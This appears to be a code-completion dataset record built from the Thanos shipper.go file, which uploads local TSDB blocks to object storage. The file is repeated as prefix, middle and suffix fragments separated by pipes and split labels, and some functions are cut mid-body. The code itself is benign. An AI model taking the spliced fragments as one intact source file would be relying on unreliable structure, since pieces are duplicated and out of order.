"github.com/prometheus/client_golang/prometheus/promauto"
"github.com/prometheus/prometheus/model/labels"
"github.com/prometheus/prometheus/tsdb"
"github.com/prometheus/prometheus/tsdb/fileutil"
"github.com/thanos-io/objstore"
"github.com/thanos-io/thanos/pkg/block"
"github.com/thanos-io/thanos/pkg/block/metadata"
"github.com/thanos-io/thanos/pkg/runutil"
)
type metrics struct {
dirSyncs prometheus.Counter
dirSyncFailures prometheus.Counter
uploads prometheus.Counter
uploadFailures prometheus.Counter
uploadedCompacted prometheus.Gauge
}
func newMetrics(reg prometheus.Registerer) *metrics {
var m metrics
m.dirSyncs = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_dir_syncs_total",
Help: "Total number of dir syncs",
})
m.dirSyncFailures = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_dir_sync_failures_total",
Help: "Total number of failed dir syncs",
})
m.uploads = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_uploads_total",
Help: "Total number of uploaded blocks",
})
m.uploadFailures = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_upload_failures_total",
Help: "Total number of block upload failures",
})
m.uploadedCompacted = promauto.With(reg).NewGauge(prometheus.GaugeOpts{
Name: "thanos_shipper_upload_compacted_done",
Help: "If 1 it means shipper uploaded all compacted blocks from the filesystem.",
})
return &m
}
// Shipper watches a directory for matching files and directories and uploads
// them to a remote data store.
type Shipper struct {
logger log.Logger
dir string
metrics *metrics
bucket objstore.Bucket
source metadata.SourceType
uploadCompactedFunc func() bool
allowOutOfOrderUploads bool
hashFunc metadata.HashFunc
labels func() labels.Labels
mtx sync.RWMutex
}
// New creates a new shipper that detects new TSDB blocks in dir and uploads them to
// remote if necessary. It attaches the Thanos metadata section in each meta JSON file.
// If uploadCompacted is enabled, it also uploads compacted blocks which are already in filesystem.
func New(
logger log.Logger,
r prometheus.Registerer,
dir string,
bucket objstore.Bucket,
lbls func() labels.Labels,
source metadata.SourceType,
uploadCompactedFunc func() bool,
allowOutOfOrderUploads bool,
hashFunc metadata.HashFunc,
) *Shipper {
if logger == nil {
logger = log.NewNopLogger()
}
if lbls == nil {
lbls = func() labels.Labels { return nil }
}
if uploadCompactedFunc == nil {
uploadCompactedFunc = func() bool {
return false
}
}
return &Shipper{
logger: logger,
dir: dir,
bucket: bucket,
labels: lbls,
metrics: newMetrics(r),
source: source,
allowOutOfOrderUploads: allowOutOfOrderUploads,
uploadCompactedFunc: uploadCompactedFunc,
hashFunc: hashFunc,
}
}
func (s *Shipper) SetLabels(lbls labels.Labels) {
s.mtx.Lock()
defer s.mtx.Unlock()
s.labels = func() labels.Labels { return lbls }
}
func (s *Shipper) getLabels() labels.Labels {
s.mtx.RLock()
defer s.mtx.RUnlock()
return s.labels()
}
// Timestamps returns the minimum timestamp for which data is available and the highest timestamp
// of blocks that were successfully uploaded.
func (s *Shipper) Timestamps() (minTime, maxSyncTime int64, err error) {
meta, err := ReadMetaFile(s.dir)
if err != nil {
return 0, 0, errors.Wrap(err, "read shipper meta file")
}
// Build a map of blocks we already uploaded.
hasUploaded := make(map[ulid.ULID]struct{}, len(meta.Uploaded))
for _, id := range meta.Uploaded {
hasUploaded[id] = struct{}{}
}
minTime = math.MaxInt64
maxSyncTime = math.MinInt64
metas, err := s.blockMetasFromOldest()
if err != nil {
return 0, 0, err
}
for _, m := range metas {
if m.MinTime < minTime {
minTime = m.MinTime
}
if _, ok := hasUploaded[m.ULID]; ok && m.MaxTime > maxSyncTime {
maxSyncTime = m.MaxTime
}
}
if minTime == math.MaxInt64 {
// No block yet found. We cannot assume any min block size so propagate 0 minTime.
minTime = 0
}
return minTime, maxSyncTime, nil
}
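// Worked example for Timestamps: with a local block covering [1000, 2000) that has
// already been uploaded and a newer block covering [2000, 3000) that has not,
// Timestamps returns minTime=1000 and maxSyncTime=2000 (illustrative millisecond
// timestamps).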
type lazyOverlapChecker struct {
synced bool
logger log.Logger
bucket objstore.Bucket
labels func() labels.Labels
metas []tsdb.BlockMeta
lookupMetas map[ulid.ULID]struct{}
}
func newLazyOverlapChecker(logger log.Logger, bucket objstore.Bucket, labels func() labels.Labels) *lazyOverlapChecker {
return &lazyOverlapChecker{
logger: logger,
bucket: bucket,
labels: labels,
lookupMetas: map[ulid.ULID]struct{}{},
}
}
func (c *lazyOverlapChecker) sync(ctx context.Context) error {
if err := c.bucket.Iter(ctx, "", func(path string) error {
id, ok := block.IsBlockDir(path)
if !ok {
return nil
}
m, err := block.DownloadMeta(ctx, c.logger, c.bucket, id)
if err != nil {
return err
}
if !labels.Equal(labels.FromMap(m.Thanos.Labels), c.labels()) {
return nil
}
c.metas = append(c.metas, m.BlockMeta)
c.lookupMetas[m.ULID] = struct{}{}
return nil
}); err != nil {
return errors.Wrap(err, "get all block meta.")
}
c.synced = true
return nil
}
func (c *lazyOverlapChecker) IsOverlapping(ctx context.Context, newMeta tsdb.BlockMeta) error {
if !c.synced {
level.Info(c.logger).Log("msg", "gathering all existing blocks from the remote bucket for check", "id", newMeta.ULID.String())
if err := c.sync(ctx); err != nil {
return err
}
}
// TODO(bwplotka) so confusing! we need to sort it first. Add comment to TSDB code.
metas := append([]tsdb.BlockMeta{newMeta}, c.metas...)
sort.Slice(metas, func(i, j int) bool {
return metas[i].MinTime < metas[j].MinTime
})
if o := tsdb.OverlappingBlocks(metas); len(o) > 0 {
// TODO(bwplotka): Consider checking if overlaps relates to block in concern?
return errors.Errorf("shipping compacted block %s is blocked; overlap spotted: %s", newMeta.ULID, o.String())
}
return nil
}
// Sync performs a single synchronization, which ensures all non-compacted local blocks have been uploaded
// to the object bucket once.
//
// If uploadCompacted is enabled, it also uploads compacted blocks which are already in the filesystem.
//
// It is not concurrency-safe, however it is compactor-safe (running concurrently with compactor is ok).
func (s *Shipper) Sync(ctx context.Context) (uploaded int, err error) {
meta, err := ReadMetaFile(s.dir)
if err != nil {
// If we encounter any error, proceed with an empty meta file and overwrite it later.
// The meta file is only used to avoid unnecessary bucket.Exists calls,
// which are properly handled by the system if they occur anyway.
if !os.IsNotExist(err) {
level.Warn(s.logger).Log("msg", "reading meta file failed, will override it", "err", err)
}
meta = &Meta{Version: MetaVersion1}
}
// Build a map of blocks we already uploaded.
hasUploaded := make(map[ulid.ULID]struct{}, len(meta.Uploaded))
for _, id := range meta.Uploaded {
hasUploaded[id] = struct{}{}
}
// Reset the uploaded slice so we can rebuild it only with blocks that still exist locally.
meta.Uploaded = nil
var (
checker = newLazyOverlapChecker(s.logger, s.bucket, s.getLabels)
uploadErrs int
)
uploadCompacted := s.uploadCompactedFunc()
metas, err := s.blockMetasFromOldest()
if err != nil {
return 0, err
}
for _, m := range metas {
// Do not sync a block if we already uploaded or ignored it. If it's no longer found in the bucket,
// it was generally removed by the compaction process.
if _, uploaded := hasUploaded[m.ULID]; uploaded {
meta.Uploaded = append(meta.Uploaded, m.ULID)
continue
}
if m.Stats.NumSamples == 0 {
// Ignore empty blocks.
level.Debug(s.logger).Log("msg", "ignoring empty block", "block", m.ULID)
continue
}
// We only ship blocks of the first compaction level as part of the normal flow.
if m.Compaction.Level > 1 {
if !uploadCompacted {
continue
}
}
// Check against bucket if the meta file for this block exists.
ok, err := s.bucket.Exists(ctx, path.Join(m.ULID.String(), block.MetaFilename))
if err != nil {
return 0, errors.Wrap(err, "check exists")
}
if ok {
meta.Uploaded = append(meta.Uploaded, m.ULID)
continue
}
// Skip the overlap check if out-of-order uploads are enabled.
if m.Compaction.Level > 1 && !s.allowOutOfOrderUploads {
if err := checker.IsOverlapping(ctx, m.BlockMeta); err != nil {
return 0, errors.Errorf("Found overlap or error during sync, cannot upload compacted block, details: %v", err)
}
}
if err := s.upload(ctx, m); err != nil {
if !s.allowOutOfOrderUploads {
return 0, errors.Wrapf(err, "upload %v", m.ULID)
}
// No error returned, just log line. This is because we want other blocks to be uploaded even
// though this one failed. It will be retried on a subsequent Sync iteration.
level.Error(s.logger).Log("msg", "shipping failed", "block", m.ULID, "err", err)
uploadErrs++
continue
}
meta.Uploaded = append(meta.Uploaded, m.ULID)
uploaded++
s.metrics.uploads.Inc()
}
if err := WriteMetaFile(s.logger, s.dir, meta); err != nil {
level.Warn(s.logger).Log("msg", "updating meta file failed", "err", err)
}
s.metrics.dirSyncs.Inc()
if uploadErrs > 0 {
s.metrics.uploadFailures.Add(float64(uploadErrs))
return uploaded, errors.Errorf("failed to sync %v blocks", uploadErrs)
}
if uploadCompacted {
s.metrics.uploadedCompacted.Set(1)
} else {
s.metrics.uploadedCompacted.Set(0)
}
return uploaded, nil
}
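// Sketch of a typical Sync caller (assumes the runutil.Repeat helper and an existing
// context; the interval and log line are illustrative, not prescribed by this file):
//
//	_ = runutil.Repeat(30*time.Second, ctx.Done(), func() error {
//		if uploaded, err := s.Sync(ctx); err != nil {
//			level.Warn(s.logger).Log("msg", "shipper sync failed", "uploaded", uploaded, "err", err)
//		}
//		return nil
//	})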
// upload uploads the block to remote storage if it does not already exist there.
// TODO(khyatisoneji): Double check if block does not have deletion-mark.json for some reason, otherwise log it or return error.
func (s *Shipper) upload(ctx context.Context, meta *metadata.Meta) error {
level.Info(s.logger).Log("msg", "upload new block", "id", meta.ULID)
// We hard-link the files into a temporary upload directory so we are not affected
// by other operations happening against the TSDB directory.
updir := filepath.Join(s.dir, "thanos", "upload", meta.ULID.String())
// Remove updir just in case.
if err := os.RemoveAll(updir); err != nil {
return errors.Wrap(err, "clean upload directory")
}
if err := os.MkdirAll(updir, 0750); err != nil {
return errors.Wrap(err, "create upload dir")
}
defer func() {
if err := os.RemoveAll(updir); err != nil {
level.Error(s.logger).Log("msg", "failed to clean upload directory", "err", err)
}
}()
dir := filepath.Join(s.dir, meta.ULID.String())
if err := hardlinkBlock(dir, updir); err != nil {
return errors.Wrap(err, "hard link block")
}
// Attach current labels and write a new meta file with Thanos extensions.
if lset := s.getLabels(); lset != nil {
meta.Thanos.Labels = lset.Map()
}
meta.Thanos.Source = s.source
meta.Thanos.SegmentFiles = block.GetSegmentFiles(updir)
if err := meta.WriteToDir(s.logger, updir); err != nil {
return errors.Wrap(err, "write meta file")
}
return block.Upload(ctx, s.logger, s.bucket, updir, s.hashFunc)
}
// blockMetasFromOldest returns the block meta of each block found in dir
// sorted by minTime asc.
func (s *Shipper) blockMetasFromOldest() (metas []*metadata.Meta, _ error) {
fis, err := os.ReadDir(s.dir)
if err != nil {
return nil, errors.Wrap(err, "read dir")
}
names := make([]string, 0, len(fis))
for _, fi := range fis {
names = append(names, fi.Name())
}
for _, n := range names {
if _, ok := block.IsBlockDir(n); !ok {
continue
}
dir := filepath.Join(s.dir, n)
fi, err := os.Stat(dir)
if err != nil {
return nil, errors.Wrapf(err, "stat block %v", dir)
}
if !fi.IsDir() {
continue
}
m, err := metadata.ReadFromDir(dir)
if err != nil {
return nil, errors.Wrapf(err, "read metadata for block %v", dir)
}
metas = append(metas, m)
}
sort.Slice(metas, func(i, j int) bool {
return metas[i].BlockMeta.MinTime < metas[j].BlockMeta.MinTime
})
return metas, nil
}
func hardlinkBlock(src, dst string) error {
chunkDir := filepath.Join(dst, block.ChunksDirname)
if err := os.MkdirAll(chunkDir, 0750); err != nil {
return errors.Wrap(err, "create chunks dir")
}
fis, err := os.ReadDir(filepath.Join(src, block.ChunksDirname))
if err != nil {
return errors.Wrap(err, "read chunk dir")
}
files := make([]string, 0, len(fis))
for _, fi := range fis {
files = append(files, fi.Name())
}
for i, fn := range files {
files[i] = filepath.Join(block.ChunksDirname, fn)
}
files = append(files, block.MetaFilename, block.IndexFilename)
for _, fn := range files {
if err := os.Link(filepath.Join(src, fn), filepath.Join(dst, fn)); err != nil {
return errors.Wrapf(err, "hard link file %s", fn)
}
}
return nil
}
// Meta defines the format of the thanos.shipper.json file that the shipper places in the data directory.
type Meta struct {
Version int `json:"version"`
Uploaded []ulid.ULID `json:"uploaded"`
}
const (
// MetaFilename is the known JSON filename for meta information.
MetaFilename = "thanos.shipper.json"
// MetaVersion1 represents version 1 of the meta file format.
MetaVersion1 = 1
)
// WriteMetaFile writes the given meta into <dir>/thanos.shipper.json.
func WriteMetaFile(logger log.Logger, dir string, meta *Meta) error |
// ReadMetaFile reads the given meta from <dir>/thanos.shipper.json.
func ReadMetaFile(dir string) (*Meta, error) {
fpath := filepath.Join(dir, filepath.Clean(MetaFilename))
b, err := os.ReadFile(fpath)
if err != nil {
return nil, errors.Wrapf(err, "failed to read %s", fpath)
}
var m Meta
if err := json.Unmarshal(b, &m); err != nil {
return nil, errors.Wrapf(err, "failed to parse %s as JSON: %q", fpath, string(b))
}
if m.Version != MetaVersion1 {
return nil, errors.Errorf("unexpected meta file version %d", m.Version)
}
return &m, nil
}
func renameFile(logger log.Logger, from, to string) error {
if err := os.RemoveAll(to); err != nil {
return err
}
if err := os.Rename(from, to); err != nil {
return err
}
// Directory was renamed; sync parent dir to persist rename.
pdir, err := fileutil.OpenDir(filepath.Dir(to))
if err != nil {
return err
}
if err = fileutil.Fdatasync(pdir); err != nil {
runutil.CloseWithLogOnErr(logger, pdir, "rename file dir close")
return err
}
return pdir.Close()
}
| {
// Make any changes to the file appear atomic.
path := filepath.Join(dir, MetaFilename)
tmp := path + ".tmp"
f, err := os.Create(tmp)
if err != nil {
return err
}
enc := json.NewEncoder(f)
enc.SetIndent("", "\t")
if err := enc.Encode(meta); err != nil {
runutil.CloseWithLogOnErr(logger, f, "write meta file close")
return err
}
if err := f.Close(); err != nil {
return err
}
return renameFile(logger, tmp, path)
} | identifier_body |
shipper.go | // Copyright (c) The Thanos Authors.
// Licensed under the Apache License 2.0.
// Package shipper detects directories on the local file system and uploads
// them to a block storage.
package shipper
import (
"context"
"encoding/json"
"math"
"os"
"path"
"path/filepath"
"sort"
"sync"
"github.com/go-kit/log"
"github.com/go-kit/log/level"
"github.com/oklog/ulid"
"github.com/pkg/errors"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/client_golang/prometheus/promauto"
"github.com/prometheus/prometheus/model/labels"
"github.com/prometheus/prometheus/tsdb"
"github.com/prometheus/prometheus/tsdb/fileutil"
"github.com/thanos-io/objstore"
"github.com/thanos-io/thanos/pkg/block"
"github.com/thanos-io/thanos/pkg/block/metadata"
"github.com/thanos-io/thanos/pkg/runutil"
)
type metrics struct {
dirSyncs prometheus.Counter
dirSyncFailures prometheus.Counter
uploads prometheus.Counter
uploadFailures prometheus.Counter
uploadedCompacted prometheus.Gauge
}
func newMetrics(reg prometheus.Registerer) *metrics {
var m metrics
m.dirSyncs = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_dir_syncs_total",
Help: "Total number of dir syncs",
})
m.dirSyncFailures = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_dir_sync_failures_total",
Help: "Total number of failed dir syncs",
})
m.uploads = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_uploads_total",
Help: "Total number of uploaded blocks",
})
m.uploadFailures = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_upload_failures_total",
Help: "Total number of block upload failures",
})
m.uploadedCompacted = promauto.With(reg).NewGauge(prometheus.GaugeOpts{
Name: "thanos_shipper_upload_compacted_done",
Help: "If 1 it means shipper uploaded all compacted blocks from the filesystem.",
})
return &m
}
// Shipper watches a directory for matching files and directories and uploads
// them to a remote data store.
type Shipper struct {
logger log.Logger
dir string
metrics *metrics
bucket objstore.Bucket
source metadata.SourceType
uploadCompactedFunc func() bool
allowOutOfOrderUploads bool
hashFunc metadata.HashFunc
labels func() labels.Labels
mtx sync.RWMutex
}
// New creates a new shipper that detects new TSDB blocks in dir and uploads them to
// remote if necessary. It attaches the Thanos metadata section in each meta JSON file.
// If uploadCompacted is enabled, it also uploads compacted blocks which are already in filesystem.
func New(
logger log.Logger,
r prometheus.Registerer,
dir string,
bucket objstore.Bucket,
lbls func() labels.Labels,
source metadata.SourceType,
uploadCompactedFunc func() bool,
allowOutOfOrderUploads bool,
hashFunc metadata.HashFunc,
) *Shipper {
if logger == nil {
logger = log.NewNopLogger()
}
if lbls == nil {
lbls = func() labels.Labels { return nil }
}
if uploadCompactedFunc == nil {
uploadCompactedFunc = func() bool {
return false
}
}
return &Shipper{
logger: logger,
dir: dir,
bucket: bucket,
labels: lbls,
metrics: newMetrics(r),
source: source,
allowOutOfOrderUploads: allowOutOfOrderUploads,
uploadCompactedFunc: uploadCompactedFunc,
hashFunc: hashFunc,
}
}
func (s *Shipper) SetLabels(lbls labels.Labels) {
s.mtx.Lock()
defer s.mtx.Unlock()
s.labels = func() labels.Labels { return lbls }
}
func (s *Shipper) getLabels() labels.Labels {
s.mtx.RLock()
defer s.mtx.RUnlock()
return s.labels()
}
// Timestamps returns the minimum timestamp for which data is available and the highest timestamp
// of blocks that were successfully uploaded.
func (s *Shipper) Timestamps() (minTime, maxSyncTime int64, err error) {
meta, err := ReadMetaFile(s.dir)
if err != nil {
return 0, 0, errors.Wrap(err, "read shipper meta file")
}
// Build a map of blocks we already uploaded.
hasUploaded := make(map[ulid.ULID]struct{}, len(meta.Uploaded))
for _, id := range meta.Uploaded {
hasUploaded[id] = struct{}{}
}
minTime = math.MaxInt64
maxSyncTime = math.MinInt64
metas, err := s.blockMetasFromOldest()
if err != nil {
return 0, 0, err
}
for _, m := range metas {
if m.MinTime < minTime {
minTime = m.MinTime
}
if _, ok := hasUploaded[m.ULID]; ok && m.MaxTime > maxSyncTime {
maxSyncTime = m.MaxTime
}
}
if minTime == math.MaxInt64 {
// No block yet found. We cannot assume any min block size so propagate 0 minTime.
minTime = 0
}
return minTime, maxSyncTime, nil
}
type lazyOverlapChecker struct {
synced bool
logger log.Logger
bucket objstore.Bucket
labels func() labels.Labels
metas []tsdb.BlockMeta
lookupMetas map[ulid.ULID]struct{}
}
func newLazyOverlapChecker(logger log.Logger, bucket objstore.Bucket, labels func() labels.Labels) *lazyOverlapChecker {
return &lazyOverlapChecker{
logger: logger,
bucket: bucket,
labels: labels,
lookupMetas: map[ulid.ULID]struct{}{},
}
}
func (c *lazyOverlapChecker) sync(ctx context.Context) error {
if err := c.bucket.Iter(ctx, "", func(path string) error {
id, ok := block.IsBlockDir(path)
if !ok {
return nil
}
m, err := block.DownloadMeta(ctx, c.logger, c.bucket, id)
if err != nil {
return err
}
if !labels.Equal(labels.FromMap(m.Thanos.Labels), c.labels()) {
return nil
}
c.metas = append(c.metas, m.BlockMeta)
c.lookupMetas[m.ULID] = struct{}{}
return nil
}); err != nil {
return errors.Wrap(err, "get all block meta.")
}
c.synced = true
return nil
}
func (c *lazyOverlapChecker) IsOverlapping(ctx context.Context, newMeta tsdb.BlockMeta) error {
if !c.synced {
level.Info(c.logger).Log("msg", "gathering all existing blocks from the remote bucket for check", "id", newMeta.ULID.String())
if err := c.sync(ctx); err != nil {
return err
}
}
// TODO(bwplotka) so confusing! we need to sort it first. Add comment to TSDB code.
metas := append([]tsdb.BlockMeta{newMeta}, c.metas...)
sort.Slice(metas, func(i, j int) bool {
return metas[i].MinTime < metas[j].MinTime
})
if o := tsdb.OverlappingBlocks(metas); len(o) > 0 {
// TODO(bwplotka): Consider checking if overlaps relates to block in concern?
return errors.Errorf("shipping compacted block %s is blocked; overlap spotted: %s", newMeta.ULID, o.String())
}
return nil
}
// Sync performs a single synchronization, which ensures all non-compacted local blocks have been uploaded
// to the object bucket once.
//
// If uploadCompacted is enabled, it also uploads compacted blocks which are already in the filesystem.
//
// It is not concurrency-safe, however it is compactor-safe (running concurrently with compactor is ok).
func (s *Shipper) Sync(ctx context.Context) (uploaded int, err error) {
meta, err := ReadMetaFile(s.dir)
if err != nil {
// If we encounter any error, proceed with an empty meta file and overwrite it later.
// The meta file is only used to avoid unnecessary bucket.Exists calls,
// which are properly handled by the system if they occur anyway.
if !os.IsNotExist(err) {
level.Warn(s.logger).Log("msg", "reading meta file failed, will override it", "err", err)
}
meta = &Meta{Version: MetaVersion1}
}
// Build a map of blocks we already uploaded.
hasUploaded := make(map[ulid.ULID]struct{}, len(meta.Uploaded))
for _, id := range meta.Uploaded {
hasUploaded[id] = struct{}{}
}
// Reset the uploaded slice so we can rebuild it only with blocks that still exist locally.
meta.Uploaded = nil
var (
checker = newLazyOverlapChecker(s.logger, s.bucket, s.getLabels)
uploadErrs int
)
uploadCompacted := s.uploadCompactedFunc()
metas, err := s.blockMetasFromOldest()
if err != nil {
return 0, err
}
for _, m := range metas {
// Do not sync a block if we already uploaded or ignored it. If it's no longer found in the bucket,
// it was generally removed by the compaction process.
if _, uploaded := hasUploaded[m.ULID]; uploaded {
meta.Uploaded = append(meta.Uploaded, m.ULID)
continue
}
if m.Stats.NumSamples == 0 {
// Ignore empty blocks.
level.Debug(s.logger).Log("msg", "ignoring empty block", "block", m.ULID)
continue
}
// We only ship blocks of the first compaction level as part of the normal flow.
if m.Compaction.Level > 1 {
if !uploadCompacted {
continue
}
}
// Check against bucket if the meta file for this block exists.
ok, err := s.bucket.Exists(ctx, path.Join(m.ULID.String(), block.MetaFilename))
if err != nil {
return 0, errors.Wrap(err, "check exists")
}
if ok {
meta.Uploaded = append(meta.Uploaded, m.ULID)
continue
}
// Skip the overlap check if out-of-order uploads are enabled.
if m.Compaction.Level > 1 && !s.allowOutOfOrderUploads {
if err := checker.IsOverlapping(ctx, m.BlockMeta); err != nil {
return 0, errors.Errorf("Found overlap or error during sync, cannot upload compacted block, details: %v", err)
}
}
if err := s.upload(ctx, m); err != nil {
if !s.allowOutOfOrderUploads {
return 0, errors.Wrapf(err, "upload %v", m.ULID)
}
// No error returned, just log line. This is because we want other blocks to be uploaded even
// though this one failed. It will be retried on a subsequent Sync iteration.
level.Error(s.logger).Log("msg", "shipping failed", "block", m.ULID, "err", err)
uploadErrs++
continue
}
meta.Uploaded = append(meta.Uploaded, m.ULID)
uploaded++
s.metrics.uploads.Inc()
}
if err := WriteMetaFile(s.logger, s.dir, meta); err != nil {
level.Warn(s.logger).Log("msg", "updating meta file failed", "err", err)
}
s.metrics.dirSyncs.Inc()
if uploadErrs > 0 {
s.metrics.uploadFailures.Add(float64(uploadErrs))
return uploaded, errors.Errorf("failed to sync %v blocks", uploadErrs)
}
if uploadCompacted {
s.metrics.uploadedCompacted.Set(1)
} else {
s.metrics.uploadedCompacted.Set(0)
}
return uploaded, nil
}
// upload uploads the block to remote storage if it does not already exist there.
// TODO(khyatisoneji): Double check if block does not have deletion-mark.json for some reason, otherwise log it or return error.
func (s *Shipper) upload(ctx context.Context, meta *metadata.Meta) error {
level.Info(s.logger).Log("msg", "upload new block", "id", meta.ULID)
// We hard-link the files into a temporary upload directory so we are not affected
// by other operations happening against the TSDB directory.
updir := filepath.Join(s.dir, "thanos", "upload", meta.ULID.String())
// Remove updir just in case.
if err := os.RemoveAll(updir); err != nil {
return errors.Wrap(err, "clean upload directory")
}
if err := os.MkdirAll(updir, 0750); err != nil {
return errors.Wrap(err, "create upload dir")
}
defer func() {
if err := os.RemoveAll(updir); err != nil {
level.Error(s.logger).Log("msg", "failed to clean upload directory", "err", err)
}
}()
dir := filepath.Join(s.dir, meta.ULID.String())
if err := hardlinkBlock(dir, updir); err != nil {
return errors.Wrap(err, "hard link block")
}
// Attach current labels and write a new meta file with Thanos extensions.
if lset := s.getLabels(); lset != nil {
meta.Thanos.Labels = lset.Map()
}
meta.Thanos.Source = s.source
meta.Thanos.SegmentFiles = block.GetSegmentFiles(updir)
if err := meta.WriteToDir(s.logger, updir); err != nil {
return errors.Wrap(err, "write meta file")
}
return block.Upload(ctx, s.logger, s.bucket, updir, s.hashFunc)
}
// blockMetasFromOldest returns the block meta of each block found in dir
// sorted by minTime asc.
func (s *Shipper) blockMetasFromOldest() (metas []*metadata.Meta, _ error) {
fis, err := os.ReadDir(s.dir)
if err != nil {
return nil, errors.Wrap(err, "read dir")
}
names := make([]string, 0, len(fis))
for _, fi := range fis {
names = append(names, fi.Name())
}
for _, n := range names {
if _, ok := block.IsBlockDir(n); !ok {
continue
}
dir := filepath.Join(s.dir, n)
fi, err := os.Stat(dir)
if err != nil {
return nil, errors.Wrapf(err, "stat block %v", dir)
}
if !fi.IsDir() {
continue
}
m, err := metadata.ReadFromDir(dir)
if err != nil {
return nil, errors.Wrapf(err, "read metadata for block %v", dir)
}
metas = append(metas, m)
}
sort.Slice(metas, func(i, j int) bool {
return metas[i].BlockMeta.MinTime < metas[j].BlockMeta.MinTime
})
return metas, nil
}
func hardlinkBlock(src, dst string) error {
chunkDir := filepath.Join(dst, block.ChunksDirname)
if err := os.MkdirAll(chunkDir, 0750); err != nil {
return errors.Wrap(err, "create chunks dir")
}
fis, err := os.ReadDir(filepath.Join(src, block.ChunksDirname))
if err != nil {
return errors.Wrap(err, "read chunk dir")
}
files := make([]string, 0, len(fis))
for _, fi := range fis {
files = append(files, fi.Name())
}
for i, fn := range files {
files[i] = filepath.Join(block.ChunksDirname, fn)
}
files = append(files, block.MetaFilename, block.IndexFilename)
for _, fn := range files {
if err := os.Link(filepath.Join(src, fn), filepath.Join(dst, fn)); err != nil {
return errors.Wrapf(err, "hard link file %s", fn)
}
} | return nil
}
// Meta defines the format of the thanos.shipper.json file that the shipper places in the data directory.
type Meta struct {
Version int `json:"version"`
Uploaded []ulid.ULID `json:"uploaded"`
}
const (
// MetaFilename is the known JSON filename for meta information.
MetaFilename = "thanos.shipper.json"
// MetaVersion1 represents version 1 of the meta file format.
MetaVersion1 = 1
)
// WriteMetaFile writes the given meta into <dir>/thanos.shipper.json.
func WriteMetaFile(logger log.Logger, dir string, meta *Meta) error {
// Make any changes to the file appear atomic.
path := filepath.Join(dir, MetaFilename)
tmp := path + ".tmp"
f, err := os.Create(tmp)
if err != nil {
return err
}
enc := json.NewEncoder(f)
enc.SetIndent("", "\t")
if err := enc.Encode(meta); err != nil {
runutil.CloseWithLogOnErr(logger, f, "write meta file close")
return err
}
if err := f.Close(); err != nil {
return err
}
return renameFile(logger, tmp, path)
}
// ReadMetaFile reads the given meta from <dir>/thanos.shipper.json.
func ReadMetaFile(dir string) (*Meta, error) {
fpath := filepath.Join(dir, filepath.Clean(MetaFilename))
b, err := os.ReadFile(fpath)
if err != nil {
return nil, errors.Wrapf(err, "failed to read %s", fpath)
}
var m Meta
if err := json.Unmarshal(b, &m); err != nil {
return nil, errors.Wrapf(err, "failed to parse %s as JSON: %q", fpath, string(b))
}
if m.Version != MetaVersion1 {
return nil, errors.Errorf("unexpected meta file version %d", m.Version)
}
return &m, nil
}
func renameFile(logger log.Logger, from, to string) error {
if err := os.RemoveAll(to); err != nil {
return err
}
if err := os.Rename(from, to); err != nil {
return err
}
// Directory was renamed; sync parent dir to persist rename.
pdir, err := fileutil.OpenDir(filepath.Dir(to))
if err != nil {
return err
}
if err = fileutil.Fdatasync(pdir); err != nil {
runutil.CloseWithLogOnErr(logger, pdir, "rename file dir close")
return err
}
return pdir.Close()
} | random_line_split |
|
shipper.go | // Copyright (c) The Thanos Authors.
// Licensed under the Apache License 2.0.
// Package shipper detects directories on the local file system and uploads
// them to a block storage.
package shipper
import (
"context"
"encoding/json"
"math"
"os"
"path"
"path/filepath"
"sort"
"sync"
"github.com/go-kit/log"
"github.com/go-kit/log/level"
"github.com/oklog/ulid"
"github.com/pkg/errors"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/client_golang/prometheus/promauto"
"github.com/prometheus/prometheus/model/labels"
"github.com/prometheus/prometheus/tsdb"
"github.com/prometheus/prometheus/tsdb/fileutil"
"github.com/thanos-io/objstore"
"github.com/thanos-io/thanos/pkg/block"
"github.com/thanos-io/thanos/pkg/block/metadata"
"github.com/thanos-io/thanos/pkg/runutil"
)
type metrics struct {
dirSyncs prometheus.Counter
dirSyncFailures prometheus.Counter
uploads prometheus.Counter
uploadFailures prometheus.Counter
uploadedCompacted prometheus.Gauge
}
func newMetrics(reg prometheus.Registerer) *metrics {
var m metrics
m.dirSyncs = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_dir_syncs_total",
Help: "Total number of dir syncs",
})
m.dirSyncFailures = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_dir_sync_failures_total",
Help: "Total number of failed dir syncs",
})
m.uploads = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_uploads_total",
Help: "Total number of uploaded blocks",
})
m.uploadFailures = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_upload_failures_total",
Help: "Total number of block upload failures",
})
m.uploadedCompacted = promauto.With(reg).NewGauge(prometheus.GaugeOpts{
Name: "thanos_shipper_upload_compacted_done",
Help: "If 1 it means shipper uploaded all compacted blocks from the filesystem.",
})
return &m
}
// Shipper watches a directory for matching files and directories and uploads
// them to a remote data store.
type Shipper struct {
logger log.Logger
dir string
metrics *metrics
bucket objstore.Bucket
source metadata.SourceType
uploadCompactedFunc func() bool
allowOutOfOrderUploads bool
hashFunc metadata.HashFunc
labels func() labels.Labels
mtx sync.RWMutex
}
// New creates a new shipper that detects new TSDB blocks in dir and uploads them to
// remote if necessary. It attaches the Thanos metadata section in each meta JSON file.
// If uploadCompacted is enabled, it also uploads compacted blocks which are already in filesystem.
func New(
logger log.Logger,
r prometheus.Registerer,
dir string,
bucket objstore.Bucket,
lbls func() labels.Labels,
source metadata.SourceType,
uploadCompactedFunc func() bool,
allowOutOfOrderUploads bool,
hashFunc metadata.HashFunc,
) *Shipper {
if logger == nil {
logger = log.NewNopLogger()
}
if lbls == nil {
lbls = func() labels.Labels { return nil }
}
if uploadCompactedFunc == nil {
uploadCompactedFunc = func() bool {
return false
}
}
return &Shipper{
logger: logger,
dir: dir,
bucket: bucket,
